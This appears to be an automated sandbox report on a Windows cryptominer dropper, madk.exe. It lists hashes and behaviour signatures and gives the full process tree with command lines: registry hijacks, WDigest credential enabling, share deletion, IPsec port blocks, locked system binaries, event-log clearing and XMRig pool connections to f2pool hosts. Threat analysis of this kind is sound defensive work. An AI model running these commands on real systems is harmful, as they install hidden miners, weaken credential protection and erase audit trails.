Analysis
- max time kernel: 151s
- max time network: 129s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 22-05-2022 05:35

Static task: static1
Behavioral task: behavioral1
- Sample: madk.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: madk.exe
- Resource: win10v2004-20220414-en
General
- Target: madk.exe
- Size: 3.4MB
- MD5: d00af5991807952929e5b986afd295c9
- SHA1: 7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
- SHA256: 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
- SHA512: c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
- Clears Windows event logs (1 TTPs)
- Detected Stratum cryptominer command
  Looks to be attempting to contact Stratum mining pool.
- XMRig Miner Payload (2 IoCs)
  yara_rule matches (resource -> rule):
  - \Windows\Fonts\rundlls.exe -> xmrig
  - C:\Windows\Fonts\rundlls.exe -> xmrig
- Executes dropped EXE (13 IoCs)
  Processes (pid process): 2016 svchost.exe, 1976 svchost.exe, 1040 svchost.exe, 364 svchost.exe, 1356 svchost.exe, 1628 svchost.exe, 1236 conhost.exe, 2000 svchost.exe, 268 svchost.exe, 1168 svchost.exe, 2016 svchost.exe, 1416 svchost.exe, 1952 rundlls.exe
- Sets file execution options in registry (2 TTPs)
- Stops running service(s) (3 TTPs)
- yara_rule: upx (19 resource matches; the signature title for this entry did not survive on the page)
  - C:\Windows\Fonts\svchost.exe -> upx (11 entries)
  - \Windows\Fonts\svchost.exe -> upx (5 entries)
  - \??\c:\windows\Fonts\svchost.exe -> upx (1 entry)
  - \??\c:\windows\Fonts\conhost.exe -> upx (1 entry)
  - C:\Windows\Fonts\conhost.exe -> upx (1 entry)
- Deletes itself (1 IoCs)
  Processes (pid process): 1668 WScript.exe
- Loads dropped DLL (6 IoCs)
  Processes (pid process): 916 madk.exe, 836, 1424, 1372, 1228, 1416 svchost.exe (no process name is given on the page for pids 836, 1424, 1372 and 1228)
- Modifies file permissions (1 TTPs, 4 IoCs)
  Processes (pid process): 2012 takeown.exe, 1384 takeown.exe, 1444 takeown.exe, 1724 takeown.exe
- Drops file in Windows directory (64 IoCs)
  Events (description, ioc, process):
  - File created \??\c:\windows\Fonts\conhost.exe by madk.exe
  - File opened for modification \??\c:\windows\Fonts\conhost.exe by madk.exe
  - File opened for modification \??\c:\windows\Fonts\svchost.exe by madk.exe
  - File created \??\c:\windows\Fonts\svchost.exe by madk.exe
  - File created \??\c:\windows\Fonts\rundlls.exe by conhost.exe
  - File opened for modification \??\c:\windows\Fonts\svchost.exe by conhost.exe
  - File opened for modification C:\Windows\Fonts\csrss.exe by attrib.exe
  - File opened for modification C:\Windows\lsass.exe by attrib.exe
  - File opened for modification C:\Windows\Fonts by attrib.exe (the remaining 56 entries, all identical)
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with WMI (4 IoCs)
  Processes (pid process): 268 WMIC.exe, 948 WMIC.exe, 1744 WMIC.exe, 1736 WMIC.exe
- Kills process with taskkill (14 IoCs)
  Processes (pid process): 1560 taskkill.exe, 904 taskkill.exe, 1396 taskkill.exe, 844 taskkill.exe, 1232 taskkill.exe, 1568 taskkill.exe, 1560 taskkill.exe, 1924 taskkill.exe, 596 taskkill.exe, 1568 taskkill.exe, 564 taskkill.exe, 836 taskkill.exe, 1956 taskkill.exe, 1816 taskkill.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid process): 1236 conhost.exe (all 64 entries)
- Suspicious behavior: LoadsDriver (1 IoCs)
  Processes (pid process): 464 (no process name given on the page)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token use (description, pid process):
  - SeDebugPrivilege: 836 taskkill.exe, 1924 taskkill.exe, 1560 taskkill.exe, 596 taskkill.exe, 1568 taskkill.exe, 844 taskkill.exe, 1560 taskkill.exe, 1956 taskkill.exe, 904 taskkill.exe
  - SeLockMemoryPrivilege: 1952 rundlls.exe
  - 1736 WMIC.exe (two identical runs of 20 tokens each): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  - 268 WMIC.exe (14 tokens): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes (pid process): 1952 rundlls.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid process): 916 madk.exe, 916 madk.exe, 1236 conhost.exe, 1236 conhost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Events (source pid and process -> target pid and process; each pair is recorded 4 times):
  - 916 madk.exe -> 1720 cmd.exe
  - 916 madk.exe -> 1616 reg.exe
  - 916 madk.exe -> 1680 reg.exe
  - 1720 cmd.exe -> 2032 attrib.exe
  - 916 madk.exe -> 1228 reg.exe
  - 916 madk.exe -> 2008 reg.exe
  - 916 madk.exe -> 1964 reg.exe
  - 916 madk.exe -> 788 sc.exe
  - 916 madk.exe -> 876 sc.exe
  - 916 madk.exe -> 1204 sc.exe
  - 916 madk.exe -> 1332 sc.exe
  - 916 madk.exe -> 1352 sc.exe
  - 916 madk.exe -> 1936 sc.exe
  - 916 madk.exe -> 976 sc.exe
  - 916 madk.exe -> 1888 sc.exe
  - 916 madk.exe -> 1560 taskkill.exe
- Views/modifies file attributes (1 TTPs, 64 IoCs)
  Processes (pid, all attrib.exe): 1380, 1204, 916, 268, 832, 1340, 1084, 2028, 904, 1648, 2028, 948, 1668, 1284, 576, 1496, 832, 1516, 780, 2036, 2044, 1552, 836, 2036, 1104, 1568, 296, 1548, 1228, 336, 2000, 1956, 1872, 960, 336, 1468, 1256, 1828, 576, 972, 1344, 784, 1372, 1948, 1080, 2028, 584, 1736, 1816, 1280, 296, 936, 1616, 1872, 1780, 1424, 1380, 1488, 1676, 1584, 296, 1344, 1168, 836
Processes (tree depth in brackets; image path, then command line; signature tags beneath each process)
[1] C:\Users\Admin\AppData\Local\Temp\madk.exe | "C:\Users\Admin\AppData\Local\Temp\madk.exe"
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r -a C:\Windows\Fonts
  [2] C:\Windows\SysWOW64\reg.exe | reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
      - Modifies registry key
  [2] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
  [2] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
  [2] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
  [2] C:\Windows\SysWOW64\sc.exe | sc stop MetPipAtcivator
  [2] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
  [2] C:\Windows\SysWOW64\sc.exe | sc delete MetPipAtcivator
  [2] C:\Windows\SysWOW64\sc.exe | sc stop SetPipAtcivator
  [2] C:\Windows\SysWOW64\sc.exe | sc delete SetPipAtcivator
  [2] C:\Windows\SysWOW64\sc.exe | sc stop MicrosotMaims
  [2] C:\Windows\SysWOW64\sc.exe | sc delete MicrosotMaims
  [2] C:\Windows\SysWOW64\sc.exe | sc stop MicrosotMais
  [2] C:\Windows\SysWOW64\sc.exe | sc delete MicrosotMais
  [2] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im dl1hots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im d1lhots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im rundlls.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\net1.exe | net1 user mm123$ /del
  [2] C:\Windows\SysWOW64\net.exe | net user mm123$ /del
    [3] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user mm123$ /del
  [2] C:\Windows\SysWOW64\net.exe | net stop mssecsvc2.0
    [3] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop mssecsvc2.0
  [2] C:\Windows\SysWOW64\sc.exe | sc delete mssecsvc2.0
  [2] C:\Windows\SysWOW64\net.exe | net stop mssecsvc2.1
    [3] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop mssecsvc2.1
  [2] C:\Windows\SysWOW64\sc.exe | sc delete mssecsvc2.1
  [2] \??\c:\windows\Fonts\svchost.exe | c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe | c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe | c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe | c:\windows\Fonts\svchost.exe start MetPipAtcivator
      - Executes dropped EXE
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c C:\Windows\TEMP\csonhost.bat
    [3] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
    [3] C:\Windows\SysWOW64\PING.EXE | ping 127.1 -n 5
        - Runs ping.exe
    [3] C:\Windows\SysWOW64\sc.exe | sc start MetPipAtcivator
    [3] C:\Windows\SysWOW64\sc.exe | sc start MetPipAtcivator
    [3] C:\Windows\SysWOW64\net.exe | net share iPC$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share iPC$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net share admin$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share admin$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net share c$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share c$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net share d$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share d$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net share e$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share e$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net share f$ /delete
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 share f$ /delete
    [3] C:\Windows\SysWOW64\net.exe | net stop lanmanserver /y
      [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop lanmanserver /y
    [3] C:\Windows\SysWOW64\sc.exe | sc config lanmanserver start= DISABLED
    [3] C:\Windows\SysWOW64\sc.exe | sc start PolicyAgent
    [3] C:\Windows\SysWOW64\sc.exe | sc config PolicyAgent start= AUTO
    [3] C:\Windows\SysWOW64\sc.exe | sc stop Graphipcs_PerfSvcs
    [3] C:\Windows\SysWOW64\sc.exe | sc delete Graphipcs_PerfSvcs
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\svchost.exe
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\svchost.exe /d everyone
    [3] C:\Windows\SysWOW64\sc.exe | sc stop conhost
    [3] C:\Windows\SysWOW64\sc.exe | sc delete conhost
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\SysWOW64\conhost.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\conhost.exe /d everyone
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
    [3] C:\Windows\SysWOW64\sc.exe | sc start PolicyAgent
    [3] C:\Windows\SysWOW64\sc.exe | sc config PolicyAgent start= AUTO
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static del all
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add policy name=Aliyun
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=Allowlist
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=denylist
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=Allow action=permit
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=deny action=block
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
    [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=Aliyun assign=y
    [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im lsars.exe /im lsacs.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im sqlservr.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\Fonts\sqlservr.exe /d everyone
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\Fonts\csrss.exe /d everyone
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\Fonts\csrss.exe
        - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\lsass.exe
        - Drops file in Windows directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\lsass.exe /d everyone
    [3] C:\Windows\SysWOW64\sc.exe | sc stop "Application Layre Gateway Saervice"
    [3] C:\Windows\SysWOW64\sc.exe | sc delete "Application Layre Gateway Saervice"
    [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im boy.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\boy.exe
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\boy.exe /d everyone
    [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im powershell.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\sethc.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g system:r
    [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im wscript.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\wevtutil.exe | wevtutil cl "windows powershell"
    [3] C:\Windows\SysWOW64\wevtutil.exe | wevtutil cl "security"
    [3] C:\Windows\SysWOW64\wevtutil.exe | wevtutil cl "system"
\??\c:\windows\Fonts\svchost.exe (depth 2)
  c:\windows\Fonts\svchost.exe start MetPipAtcivator
- Executes dropped EXE

C:\Windows\SysWOW64\WScript.exe (depth 2)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
- Deletes itself

\??\c:\windows\Fonts\svchost.exe (depth 1)
  c:\windows\Fonts\svchost.exe
- Executes dropped EXE

\??\c:\windows\Fonts\conhost.exe (depth 2)
  "c:\windows\Fonts\conhost.exe"
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe (depth 4)
  attrib -s -h -r -a C:\Windows\Fonts
- Views/modifies file attributes

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe (depth 4)
  attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im taskmgr.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im taskmgr.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im rundll32.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im rundll32.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im autoruns.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im autoruns.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im perfmon.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im perfmon.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im procexp.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im procexp.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c taskkill /im ProcessHacker.exe /f /T

C:\Windows\SysWOW64\taskkill.exe (depth 4)
  taskkill /im ProcessHacker.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe (depth 4)
  attrib -s -h -r -a C:\Windows\Fonts
- Drops file in Windows directory
\??\c:\windows\Fonts\svchost.exe (depth 3)
  c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
- Executes dropped EXE

\??\c:\windows\Fonts\svchost.exe (depth 3)
  c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
- Executes dropped EXE

\??\c:\windows\Fonts\svchost.exe (depth 3)
  c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- Executes dropped EXE

\??\c:\windows\Fonts\svchost.exe (depth 3)
  c:\windows\Fonts\svchost.exe start SetPipAtcivator
- Executes dropped EXE
C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe (depth 4)
  attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes

(The cmd.exe/attrib.exe pair above occurs 95 times in a row at this point in the tree, with identical command lines; the sandbox tagged individual repeats with "Drops file in Windows directory", "Views/modifies file attributes", both, or neither.)
-
\??\c:\windows\Fonts\svchost.exe (depth 1)
  c:\windows\Fonts\svchost.exe
- Executes dropped EXE
- Loads dropped DLL

\??\c:\windows\Fonts\rundlls.exe (depth 2)
  "rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
